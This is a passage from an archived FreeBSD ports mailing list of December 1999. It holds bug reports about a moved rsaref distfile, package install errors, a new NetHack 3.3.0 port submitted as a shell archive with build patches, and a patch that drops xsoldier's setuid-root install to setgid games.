Received: from bgp.nu (bgp.nu [204.151.1.27]) by hub.freebsd.org (Postfix) with ESMTP id 76B7715617 for ; Thu, 16 Dec 1999 06:42:23 -0800 (PST) (envelope-from pauls@bgp.nu) Received: (from pauls@localhost) by bgp.nu (8.9.3/8.9.3) id JAA01546; Thu, 16 Dec 1999 09:42:31 -0500 (EST) (envelope-from pauls) Message-Id: <199912161442.JAA01546@bgp.nu> Date: Thu, 16 Dec 1999 09:42:31 -0500 (EST) From: Paul Southworth Reply-To: pauls@bgp.nu To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15516: rsaref port - bad distfile fetch Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15516 >Category: ports >Synopsis: rsaref distfile location changed >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Dec 16 06:50:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Paul Southworth >Release: FreeBSD 3.3-RELEASE i386 >Organization: >Environment: FreeBSD 3.3-R, ports from -current as of 12/15/99. >Description: This port tries to fetch its distfile from all sorts of places that don't have it. >How-To-Repeat: cd /usr/ports/security/rsaref && make >Fix: ftp://ftp.zedz.net/pub/crypto/crypto/LIBS/rsa/rsaref20.1996.tar.Z That is where the replay.com stuff ended up - note that both the hostname and path are different from what's in the Makefile. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 16 7:50: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8FC6C14F98 for ; Thu, 16 Dec 1999 07:50:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA03728; Thu, 16 Dec 1999 07:50:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 16 Dec 1999 07:50:03 -0800 (PST) Message-Id: <199912161550.HAA03728@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Maxim Sobolev Subject: Re: ports/15355: [PATCH] New version 2.4 of WmakerConf (x11-wm/wmakerconf) port Reply-To: Maxim Sobolev Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15355; it has been noted by GNATS. From: Maxim Sobolev To: freebsd-gnats-submit@FreeBSD.ORG, sobomax@altavista.net, saper@system.pl, gibbs@FreeBSD.ORG Cc: Subject: Re: ports/15355: [PATCH] New version 2.4 of WmakerConf (x11-wm/wmakerconf) port Date: Thu, 16 Dec 1999 17:42:29 +0200 Hey folks! There is NO kern/15355 PR, so please do not spam my ports/15355!!!!! (look at http://www.FreeBSD.org/cgi/query-pr.cgi?pr=15355 :-\ ). -Maxim To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 16 8: 0: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 63220152E8 for ; Thu, 16 Dec 1999 08:00:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA04832; Thu, 16 Dec 1999 08:00:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 16 Dec 1999 08:00:03 -0800 (PST) Message-Id: <199912161600.IAA04832@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Marcin Cieslak Subject: Re: ports/15355: [PATCH] New version 2.4 of WmakerConf (x11-wm/wmakerconf) port Reply-To: Marcin Cieslak Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15355; it has been noted by GNATS. From: Marcin Cieslak To: Maxim Sobolev Cc: freebsd-gnats-submit@FreeBSD.ORG, gibbs@FreeBSD.ORG Subject: Re: ports/15355: [PATCH] New version 2.4 of WmakerConf (x11-wm/wmakerconf) port Date: Thu, 16 Dec 1999 16:56:44 +0100 (MET) On Thu, 16 Dec 1999, Maxim Sobolev wrote: > There is NO kern/15355 PR, so please do not spam my ports/15355!!!!! > (look at http://www.FreeBSD.org/cgi/query-pr.cgi?pr=15355 :-\ ). Sorry. I think this is a bug in PR? We've had kern/15356.... Shall we PR a PR? :) -- << Marcin Cieslak // saper@system.pl >> ----------------------------------------------------------------- SYSTEM Internet Provider http://www.system.pl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 16 8: 2:51 1999 Delivered-To: freebsd-ports@freebsd.org Received: from nets5.rz.rwth-aachen.de (nets5.rz.RWTH-Aachen.DE [137.226.144.13]) by hub.freebsd.org (Postfix) with ESMTP id 3531614F51 for ; Thu, 16 Dec 1999 08:02:49 -0800 (PST) (envelope-from kuku@gilberto.physik.RWTH-Aachen.DE) Received: from campino.informatik.rwth-aachen.de (campino.Informatik.RWTH-Aachen.DE [137.226.116.240]) by nets5.rz.rwth-aachen.de (8.9.1a/8.9.1/8) with ESMTP id RAA17574 for ; Thu, 16 Dec 1999 17:02:47 +0100 (MET) Received: from gil.physik.rwth-aachen.de (gilberto.physik.rwth-aachen.de [137.226.30.2]) by campino.informatik.rwth-aachen.de (8.9.1a/8.9.1/3) with ESMTP id RAA08318 for ; Thu, 16 Dec 1999 17:02:46 +0100 (MET) Received: (from kuku@localhost) by gil.physik.rwth-aachen.de (8.9.3/8.6.9) id RAA46161 for freebsd-ports@freebsd.org; Thu, 16 Dec 1999 17:02:52 +0100 (CET) Date: Thu, 16 Dec 1999 17:02:52 +0100 (CET) From: Christoph Kukulies Message-Id: <199912161602.RAA46161@gil.physik.rwth-aachen.de> To: freebsd-ports@freebsd.org Subject: 3.3 packages - strange i/o errors Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm trying to pkg_add gimp-1.1.5.tgz: isdn-kukulies# (cd /usr/tmp ; pkg_add /cdrom/packages/graphics/gimp-i18n-1.1.8.tgz ) gzip: stdin: Input/output error tar: child returned status 1 tar: +CONTENTS not found in archive pkg_add: unable to open table of contents file `+CONTENTS' - not a package? isdn-kukulies# tar ztvf gimp-1.1.5.tgz gzip: stdin: Input/output error tar: child returned status 1 isdn-kukulies# ls isdn-kukulies# cd ../All isdn-kukulies# ls -l gimp* -rw-r--r-- 1 root wheel 3731216 Sep 12 14:49 gimp-1.1.5.tgz -rw-r--r-- 1 root wheel 4000445 Sep 12 14:49 gimp-i18n-1.1.8.tgz isdn-kukulies# cp gimp* /usr/tmp cp: /usr/tmp/gimp-i18n-1.1.8.tgz: Bad address cp: /usr/tmp/gimp-1.1.5.tgz: Bad address --- Bad CD? -- Chris Christoph P. U. Kukulies kuku@gil.physik.rwth-aachen.de To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 16 9: 0:14 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 15EE114F3E for ; Thu, 16 Dec 1999 09:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA11874; Thu, 16 Dec 1999 09:00:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 16A8D14CAB; Thu, 16 Dec 1999 08:58:30 -0800 (PST) Message-Id: <19991216165830.16A8D14CAB@hub.freebsd.org> Date: Thu, 16 Dec 1999 08:58:30 -0800 (PST) From: nethack@chaos.dk To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15517: Port of newly released game nethack 3.3.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15517 >Category: ports >Synopsis: Port of newly released game nethack 3.3.0 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Thu Dec 16 09:00:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Ole Moller >Release: 3.1-RELEASE >Organization: chaos.dk >Environment: >Description: I followed the description at http://www.freebsd.org/handbook/ports-advanced.html and thinks it complies (this beeing my first port I really dont know) heavily inspired by the old nethack port. I have put a copy of the original tarball online (http://www.mame.dk/nethack/nethack-3.3.0.tar.gz) as a backup for the primary site. The compile should work fine with both tty and XFree, I couldnt figure out how to make the XFree-stuff optional though. >How-To-Repeat: >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # /usr/ports/games/nethack3 # /usr/ports/games/nethack3/Makefile # /usr/ports/games/nethack3/files # /usr/ports/games/nethack3/files/md5 # /usr/ports/games/nethack3/patches # /usr/ports/games/nethack3/patches/patch-mail.c # /usr/ports/games/nethack3/patches/patch-system.h # /usr/ports/games/nethack3/patches/patch-config.h # /usr/ports/games/nethack3/patches/patch-Makefile.top # /usr/ports/games/nethack3/patches/patch-Makefile.src # /usr/ports/games/nethack3/patches/patch-Makefile.doc # /usr/ports/games/nethack3/patches/patch-unixconf.h # /usr/ports/games/nethack3/pkg # /usr/ports/games/nethack3/pkg/COMMENT # /usr/ports/games/nethack3/pkg/DESCR # /usr/ports/games/nethack3/pkg/PLIST # echo c - /usr/ports/games/nethack3 mkdir -p /usr/ports/games/nethack3 > /dev/null 2>&1 echo x - /usr/ports/games/nethack3/Makefile sed 's/^X//' >/usr/ports/games/nethack3/Makefile << 'END-of-/usr/ports/games/nethack3/Makefile' X# New ports collection makefile for: nethack X# Version required: 3.3.0 X# Date created: 10 December 1999 X# Whom: Ole Moller X# X# $FreeBSD$ X# X XDISTNAME= nethack-3.3.0 XCATEGORIES= games XMASTER_SITES= ftp://ftp.nethack.org/pub/nethack/src/ \ X http://www.mame.dk/nethack/ X XMAINTAINER= nethack@chaos.dk X XLIB_DEPENDS= Xpm.4:${PORTSDIR}/graphics/xpm X XMAN6= dgn_comp.6 dlb.6 lev_comp.6 nethack.6 recover.6 X Xpre-configure: X @cd ${WRKSRC}/sys/unix; ${SH} setup.sh X Xpost-install: X strip ${PREFIX}/share/nethack/nethack X @cd ${WRKSRC}/doc; chmod 644 *.6 X @cd ${WRKSRC}/doc; PREFIX=${PREFIX} ${MAKE} manpages X.if !defined(NOPORTDOCS) X ${MKDIR} ${PREFIX}/share/doc/nethack X ${CP} ${WRKSRC}/doc/Guidebook.txt ${PREFIX}/share/doc/nethack X.endif X X.include END-of-/usr/ports/games/nethack3/Makefile echo c - /usr/ports/games/nethack3/files mkdir -p /usr/ports/games/nethack3/files > /dev/null 2>&1 echo x - /usr/ports/games/nethack3/files/md5 sed 's/^X//' >/usr/ports/games/nethack3/files/md5 << 'END-of-/usr/ports/games/nethack3/files/md5' XMD5 (nethack-3.3.0.tar.gz) = cf9f4039408321f39c3ef733455cb73a END-of-/usr/ports/games/nethack3/files/md5 echo c - /usr/ports/games/nethack3/patches mkdir -p /usr/ports/games/nethack3/patches > /dev/null 2>&1 echo x - /usr/ports/games/nethack3/patches/patch-mail.c sed 's/^X//' >/usr/ports/games/nethack3/patches/patch-mail.c << 'END-of-/usr/ports/games/nethack3/patches/patch-mail.c' X--- ./src/mail.c.org Sat Dec 11 06:20:54 1999 X+++ ./src/mail.c Thu Dec 16 15:16:20 1999 X@@ -71,11 +71,15 @@ X # ifdef LINUX X # define MAILPATH "/var/spool/mail" X # else X-# if defined(BSD) || defined(ULTRIX) X-# define MAILPATH "/usr/spool/mail/" X-# endif X-# if defined(SYSV) || defined(HPUX) X-# define MAILPATH "/usr/mail/" X+# if defined(__FreeBSD__) X+# define MAILPATH "/var/mail" X+# else X+# if defined(BSD) || defined(ULTRIX) X+# define MAILPATH "/usr/spool/mail/" X+# endif X+# if defined(SYSV) || defined(HPUX) X+# define MAILPATH "/usr/mail/" X+# endif X # endif X # endif /* LINUX */ X # endif /* AMS */ END-of-/usr/ports/games/nethack3/patches/patch-mail.c echo x - /usr/ports/games/nethack3/patches/patch-system.h sed 's/^X//' >/usr/ports/games/nethack3/patches/patch-system.h << 'END-of-/usr/ports/games/nethack3/patches/patch-system.h' X--- ./include/system.h.org Thu Dec 16 14:35:16 1999 X+++ ./include/system.h Thu Dec 16 14:37:08 1999 X@@ -80,7 +80,7 @@ X # if !defined(SUNOS4) || defined(RANDOM) X E void FDECL(srandom, (unsigned int)); X # else X-# ifndef bsdi X+# if !defined(bsdi) && !defined(__FreeBSD__) X E int FDECL(srandom, (unsigned int)); X # endif X # endif END-of-/usr/ports/games/nethack3/patches/patch-system.h echo x - /usr/ports/games/nethack3/patches/patch-config.h sed 's/^X//' >/usr/ports/games/nethack3/patches/patch-config.h << 'END-of-/usr/ports/games/nethack3/patches/patch-config.h' X--- ./include/config.h.org Thu Dec 16 14:39:45 1999 X+++ ./include/config.h Thu Dec 16 14:46:53 1999 X@@ -43,7 +43,7 @@ X * Some combinations make no sense. See the installation document. X */ X #define TTY_GRAPHICS /* good old tty based graphics */ X-/* #define X11_GRAPHICS */ /* X11 interface */ X+#define X11_GRAPHICS /* X11 interface */ X /* #define QT_GRAPHICS */ /* Qt interface */ X X /* X@@ -92,7 +92,7 @@ X * would allow: X * xpmtoppm x11tiles_big.xpm X */ X-/* # define USE_XPM */ /* Disable if you do not have the XPM library */ X+# define USE_XPM /* Disable if you do not have the XPM library */ X # ifdef USE_XPM X # define GRAPHIC_TOMBSTONE /* Use graphical tombstone (rip.xpm) */ X # endif X@@ -133,11 +133,11 @@ X X #ifdef UNIX X /* path and file name extension for compression program */ X-#define COMPRESS "/usr/bin/compress" /* Lempel-Ziv compression */ X-#define COMPRESS_EXTENSION ".Z" /* compress's extension */ X+/* #define COMPRESS "/usr/bin/compress" */ /* Lempel-Ziv compression */ X+/* #define COMPRESS_EXTENSION ".Z" */ /* compress's extension */ X /* An example of one alternative you might want to use: */ X-/* #define COMPRESS "/usr/local/bin/gzip" */ /* FSF gzip compression */ X-/* #define COMPRESS_EXTENSION ".gz" */ /* normal gzip extension */ X+#define COMPRESS "/usr/bin/gzip" /* FSF gzip compression */ X+#define COMPRESS_EXTENSION ".gz" /* normal gzip extension */ X #endif X X #ifndef COMPRESS X@@ -168,7 +168,7 @@ X * otherwise it will be the current directory. X */ X # ifndef HACKDIR X-# define HACKDIR "/usr/games/lib/nethackdir" /* nethack directory */ X+# define HACKDIR "/usr/local/share/nethack" /* nethack directory */ X # endif X X /* END-of-/usr/ports/games/nethack3/patches/patch-config.h echo x - /usr/ports/games/nethack3/patches/patch-Makefile.top sed 's/^X//' >/usr/ports/games/nethack3/patches/patch-Makefile.top << 'END-of-/usr/ports/games/nethack3/patches/patch-Makefile.top' X--- ./sys/unix/Makefile.top.org Thu Dec 16 14:48:15 1999 X+++ ./sys/unix/Makefile.top Thu Dec 16 16:35:46 1999 X@@ -14,17 +14,16 @@ X # MAKE = make X X # make NetHack X-PREFIX = /usr X GAME = nethack X GAMEUID = games X-GAMEGRP = bin X+GAMEGRP = games X X # Permissions - some places use setgid instead of setuid, for instance X # See also the option "SECURE" in include/config.h X-GAMEPERM = 04755 X-FILEPERM = 0644 X+GAMEPERM = 02755 X+FILEPERM = 0664 X EXEPERM = 0755 X-DIRPERM = 0755 X+DIRPERM = 0775 X X # GAMEDIR also appears in config.h as "HACKDIR". X # X@@ -33,8 +32,8 @@ X # therefore there should not be anything in GAMEDIR that you want to keep X # (if there is, you'll have to do the installation by hand or modify the X # instructions) X-GAMEDIR = $(PREFIX)/games/lib/$(GAME)dir X-SHELLDIR = $(PREFIX)/games X+GAMEDIR = ${PREFIX}/share/$(GAME) X+SHELLDIR = ${PREFIX}/bin X X # per discussion in Install.X11 and Install.Qt X VARDATND = END-of-/usr/ports/games/nethack3/patches/patch-Makefile.top echo x - /usr/ports/games/nethack3/patches/patch-Makefile.src sed 's/^X//' >/usr/ports/games/nethack3/patches/patch-Makefile.src << 'END-of-/usr/ports/games/nethack3/patches/patch-Makefile.src' X--- ./sys/unix/Makefile.src.org Thu Dec 16 14:52:05 1999 X+++ ./sys/unix/Makefile.src Thu Dec 16 15:12:50 1999 X@@ -132,8 +132,8 @@ X # flags for debugging: X # CFLAGS = -g -I../include X X-CFLAGS = -O -I../include X-LFLAGS = X+CFLAGS += -O -I../include -I${X11BASE}/include X+LFLAGS = -L${X11BASE}/lib X X # Only used for Qt interface (other interfaces are standard C) X CXXFLAGS = -g $(CFLAGS) -I. -I$(QTDIR)/include X@@ -165,8 +165,8 @@ X X # X # X-WINSRC = $(WINTTYSRC) X-WINOBJ = $(WINTTYOBJ) X+WINSRC = $(WINTTYSRC) $(WINX11SRC) X+WINOBJ = $(WINTTYOBJ) $(WINX11OBJ) X X # on some systems the termcap library is in -ltermcap or -lcurses X # on 386 Xenix, the -ltermlib tputs() seems not to work; use -lcurses instead X@@ -186,7 +186,7 @@ X # X # libraries for X11 X # If USE_XPM is defined in config.h, you will also need -lXpm here. X-WINX11LIB = -lXaw -lXmu -lXext -lXt -lX11 X+WINX11LIB = -lXaw -lXmu -lXext -lXt -lX11 -lXpm X # WINX11LIB = -lXaw -lXmu -lXt -lX11 X # WINX11LIB = -lXaw -lXmu -lXext -lXt -lXpm -lX11 -lm X # WINX11LIB = -lXaw -lXmu -lXpm -lXext -lXt -lX11 -lSM -lICE -lm # BSD/OS 2.0 X@@ -199,7 +199,7 @@ X # X # X X-WINLIB = $(WINTTYLIB) X+WINLIB = $(WINTTYLIB) $(WINX11LIB) X X # any other strange libraries your system needs (for Sysunix only -- the more X # specialized targets should already be right) X@@ -223,7 +223,7 @@ X # IRIX 4.0.x needs -lsun if NIS (YP) is being used for passwd file lookup X # LIBS = -lsun X # X-LIBS = X+LIBS = -lSM -lICE X X # make NetHack X GAME = nethack END-of-/usr/ports/games/nethack3/patches/patch-Makefile.src echo x - /usr/ports/games/nethack3/patches/patch-Makefile.doc sed 's/^X//' >/usr/ports/games/nethack3/patches/patch-Makefile.doc << 'END-of-/usr/ports/games/nethack3/patches/patch-Makefile.doc' X--- ./sys/unix/Makefile.doc.org Thu Dec 16 14:47:20 1999 X+++ ./sys/unix/Makefile.doc Thu Dec 16 14:48:00 1999 X@@ -31,7 +31,7 @@ X X X GAME = nethack X-MANDIR = /usr/man/man6 X+MANDIR = ${PREFIX}/man/man6 X MANEXT = 6 X X # manual installation for most BSD-style systems END-of-/usr/ports/games/nethack3/patches/patch-Makefile.doc echo x - /usr/ports/games/nethack3/patches/patch-unixconf.h sed 's/^X//' >/usr/ports/games/nethack3/patches/patch-unixconf.h << 'END-of-/usr/ports/games/nethack3/patches/patch-unixconf.h' X--- ./include/unixconf.h.org Thu Dec 16 14:37:38 1999 X+++ ./include/unixconf.h Thu Dec 16 15:20:35 1999 X@@ -45,7 +45,7 @@ X /* #define AIX_31 */ /* In AIX 3.1 (IBM RS/6000) use BSD ioctl's to gain X * job control (note that AIX is SYSV otherwise) X * Also define this for AIX 3.2 */ X-#define TERMINFO /* uses terminfo rather than termcap */ X+/* #define TERMINFO */ /* uses terminfo rather than termcap */ X /* Should be defined for most SYSV, SVR4 (including X * Solaris 2+), HPUX, and Linux systems. In X * particular, it should NOT be defined for the UNIXPC X@@ -173,7 +173,11 @@ X # ifdef __sgi X #define DEF_MAILREADER "/usr/sbin/Mail" X # else X+# if defined(__FreeBSD__) X+#define DEF_MAILREADER "/usr/bin/mail" X+# else X #define DEF_MAILREADER "/usr/bin/mailx" X+# endif X # endif X # endif X # else END-of-/usr/ports/games/nethack3/patches/patch-unixconf.h echo c - /usr/ports/games/nethack3/pkg mkdir -p /usr/ports/games/nethack3/pkg > /dev/null 2>&1 echo x - /usr/ports/games/nethack3/pkg/COMMENT sed 's/^X//' >/usr/ports/games/nethack3/pkg/COMMENT << 'END-of-/usr/ports/games/nethack3/pkg/COMMENT' XA dungeon explorin', slashin', hackin' game. END-of-/usr/ports/games/nethack3/pkg/COMMENT echo x - /usr/ports/games/nethack3/pkg/DESCR sed 's/^X//' >/usr/ports/games/nethack3/pkg/DESCR << 'END-of-/usr/ports/games/nethack3/pkg/DESCR' XNetHack is a single player dungeon exploration game that runs on a wide variety Xof computer systems, with a variety of graphical and text interfaces all using Xthe same game engine. Unlike many other Dungeons & Dragons-inspired games, the Xemphasis in NetHack is on discovering the detail of the dungeon and not simply Xkilling everything in sight - in fact, killing everything in sight is a good Xway to die quickly. Each game presents a different landscape - the random Xnumber generator provides an essentially unlimited number of variations of the Xdungeon and its denizens to be discovered by the player in one of a number of Xcharacters: you can pick your race, your role, and your gender. X XFor more information, see X http://www.nethack.org/ X http://www.win.tue.nl/games/roguelike/nethack/ X news://rec.games.roguelike.nethack/ X X- Ole Moller Xnethack@chaos.dk END-of-/usr/ports/games/nethack3/pkg/DESCR echo x - /usr/ports/games/nethack3/pkg/PLIST sed 's/^X//' >/usr/ports/games/nethack3/pkg/PLIST << 'END-of-/usr/ports/games/nethack3/pkg/PLIST' Xbin/nethack Xshare/doc/nethack/Guidebook.txt Xshare/nethack/license Xshare/nethack/quest.dat Xshare/nethack/options Xshare/nethack/oracles Xshare/nethack/data Xshare/nethack/Wiz-strt.lev Xshare/nethack/Val-strt.lev Xshare/nethack/Tou-strt.lev Xshare/nethack/Sam-strt.lev Xshare/nethack/Rog-strt.lev Xshare/nethack/Ran-strt.lev Xshare/nethack/Pri-strt.lev Xshare/nethack/Mon-strt.lev Xshare/nethack/Kni-strt.lev Xshare/nethack/Hea-strt.lev Xshare/nethack/Cav-strt.lev Xshare/nethack/Bar-strt.lev Xshare/nethack/Arc-strt.lev Xshare/nethack/Wiz-loca.lev Xshare/nethack/Val-loca.lev Xshare/nethack/Tou-loca.lev Xshare/nethack/Sam-loca.lev Xshare/nethack/Rog-loca.lev Xshare/nethack/Ran-loca.lev Xshare/nethack/Pri-loca.lev Xshare/nethack/Mon-loca.lev Xshare/nethack/Kni-loca.lev Xshare/nethack/Hea-loca.lev Xshare/nethack/Cav-loca.lev Xshare/nethack/Bar-loca.lev Xshare/nethack/Arc-loca.lev Xshare/nethack/Wiz-filb.lev Xshare/nethack/Wiz-fila.lev Xshare/nethack/Val-filb.lev Xshare/nethack/Val-fila.lev Xshare/nethack/Tou-filb.lev Xshare/nethack/Tou-fila.lev Xshare/nethack/Sam-filb.lev Xshare/nethack/Sam-fila.lev Xshare/nethack/Rog-filb.lev Xshare/nethack/Rog-fila.lev Xshare/nethack/Ran-filb.lev Xshare/nethack/Ran-fila.lev Xshare/nethack/Pri-filb.lev Xshare/nethack/Pri-fila.lev Xshare/nethack/Mon-filb.lev Xshare/nethack/Mon-fila.lev Xshare/nethack/Kni-filb.lev Xshare/nethack/Kni-fila.lev Xshare/nethack/Hea-filb.lev Xshare/nethack/Hea-fila.lev Xshare/nethack/Cav-filb.lev Xshare/nethack/Cav-fila.lev Xshare/nethack/Bar-filb.lev Xshare/nethack/Bar-fila.lev Xshare/nethack/Arc-filb.lev Xshare/nethack/Arc-fila.lev Xshare/nethack/Wiz-goal.lev Xshare/nethack/Val-goal.lev Xshare/nethack/Tou-goal.lev Xshare/nethack/Sam-goal.lev Xshare/nethack/Rog-goal.lev Xshare/nethack/Ran-goal.lev Xshare/nethack/Pri-goal.lev Xshare/nethack/Mon-goal.lev Xshare/nethack/Kni-goal.lev Xshare/nethack/Hea-goal.lev Xshare/nethack/Cav-goal.lev Xshare/nethack/Bar-goal.lev Xshare/nethack/Arc-goal.lev Xshare/nethack/water.lev Xshare/nethack/fire.lev Xshare/nethack/earth.lev Xshare/nethack/air.lev Xshare/nethack/astral.lev Xshare/nethack/wizard3.lev Xshare/nethack/wizard2.lev Xshare/nethack/wizard1.lev Xshare/nethack/valley.lev Xshare/nethack/tower3.lev Xshare/nethack/tower2.lev Xshare/nethack/tower1.lev Xshare/nethack/soko4-2.lev Xshare/nethack/soko4-1.lev Xshare/nethack/soko3-2.lev Xshare/nethack/soko3-1.lev Xshare/nethack/soko2-2.lev Xshare/nethack/soko2-1.lev Xshare/nethack/soko1-2.lev Xshare/nethack/soko1-1.lev Xshare/nethack/sanctum.lev Xshare/nethack/orcus.lev Xshare/nethack/oracle.lev Xshare/nethack/minetn-2.lev Xshare/nethack/minetn-1.lev Xshare/nethack/minefill.lev Xshare/nethack/minend-2.lev Xshare/nethack/minend-1.lev Xshare/nethack/medusa-2.lev Xshare/nethack/medusa-1.lev Xshare/nethack/knox.lev Xshare/nethack/juiblex.lev Xshare/nethack/fakewiz2.lev Xshare/nethack/fakewiz1.lev Xshare/nethack/castle.lev Xshare/nethack/bigrm-5.lev Xshare/nethack/bigrm-4.lev Xshare/nethack/bigrm-3.lev Xshare/nethack/bigrm-2.lev Xshare/nethack/bigrm-1.lev Xshare/nethack/dungeon Xshare/nethack/baalz.lev Xshare/nethack/asmodeus.lev Xshare/nethack/wizhelp Xshare/nethack/opthelp Xshare/nethack/history Xshare/nethack/cmdhelp Xshare/nethack/hh Xshare/nethack/help Xshare/nethack/rumors Xshare/nethack/nethack X@mode 664 Xshare/nethack/perm Xshare/nethack/record Xshare/nethack/logfile X@exec mkdir %D/share/nethack/save X@exec chmod -R 775 %D/share/nethack X@exec chmod 2755 %D/share/nethack/nethack X@exec chown games.games %D/share/nethack/save X@unexec rm -rf %D/share/nethack/save X@dirrm share/nethack END-of-/usr/ports/games/nethack3/pkg/PLIST exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 16 11:10: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E799414E55 for ; Thu, 16 Dec 1999 11:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA24284; Thu, 16 Dec 1999 11:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from anarcat.dyndns.org (phobos.IRO.UMontreal.CA [132.204.20.20]) by hub.freebsd.org (Postfix) with ESMTP id 165E914D66 for ; Thu, 16 Dec 1999 11:06:49 -0800 (PST) (envelope-from spidey@anarcat.dyndns.org) Received: by anarcat.dyndns.org (Postfix, from userid 1000) id 2700E198A; Thu, 16 Dec 1999 14:06:31 -0500 (EST) Message-Id: <19991216190631.2700E198A@anarcat.dyndns.org> Date: Thu, 16 Dec 1999 14:06:31 -0500 (EST) From: beaupran@iro.umontreal.ca Reply-To: beaupran@iro.umontreal.ca To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15518: Patch to make xsoldier setgid games instead of setuid root Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15518 >Category: ports >Synopsis: Patch to make xsoldier setgid games instead of setuid root >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Thu Dec 16 11:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: AnarCat >Release: FreeBSD 3.3-STABLE i386 >Organization: >Environment: Any FreeBSD box with a recent port collection >Description: The port games/xsoldier is installed setuid root without any visible reason except for a high score file. It should logically be setgid games, as the file be chgrp games. >How-To-Repeat: N/A. >Fix: Replace the patch/patch-aa by the following: *** Imakefile.orig Fri Feb 28 10:48:57 1997 --- Imakefile Thu Dec 16 13:58:22 1999 *************** *** 6,63 **** /* ----------------------------------------------------------------------- */ ! /* -------------------- ¤½¤Î1 ¥¤¥ó¥¹¥È¡¼¥ëÀè¤ÎÀßÄê ----------------------- */ /* ----------------------------------------------------------------------- */ ! /* ¥¤¥ó¥¹¥È¡¼¥ë¥Ç¥£¥ì¥¯¥È¥ê */ ! /* ½ñ¤­¹þ¤ß¸¢¸Â¤¬Ìµ¤¤¤È¥¤¥ó¥¹¥È¡¼¥ë½ÐÍè¤Þ¤»¤ó¡¥=> Í·¤Ù¤Ê¤¤¡¥(^^; */ ! PIXMAPDIR = /usr/local/games/lib/xsoldier ! SCOREDIR = /usr/local/games/lib/xsoldier ! BINDIR = /usr/local/games ! /* ¥¹¥³¥¢¥Õ¥¡¥¤¥ë̾¡¥SCOREDIR °Ê²¼¤ËÃÖ¤«¤ì¤Þ¤¹¡¥ */ SCOREFILE = .scorefile /* ----------------------------------------------------------------------- */ ! /* --------------------- ¤½¤Î2 ¥³¥ó¥Ñ¥¤¥ë¤ÎÀßÄê -------------------------- */ /* ----------------------------------------------------------------------- */ ! /* xmkmf ¤Î Makefile ¤Ç cc ¤Ë¤Ê¤Ã¤Á¤ã¤¦¾ì¹ç */ /* CC = gcc */ ! /* xpm¤¬X¤È°Û¤Ê¤ë¥Ç¥£¥ì¥¯¥È¥ê¤Ë¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤Æ¤¤¤ë¾ì¹ç */ /* XPMINCDIR = /usr/X11R6/include */ /* XPMLIBDIR = /usr/X11R6/lib */ ! /* ¥³¥³¤Ë path 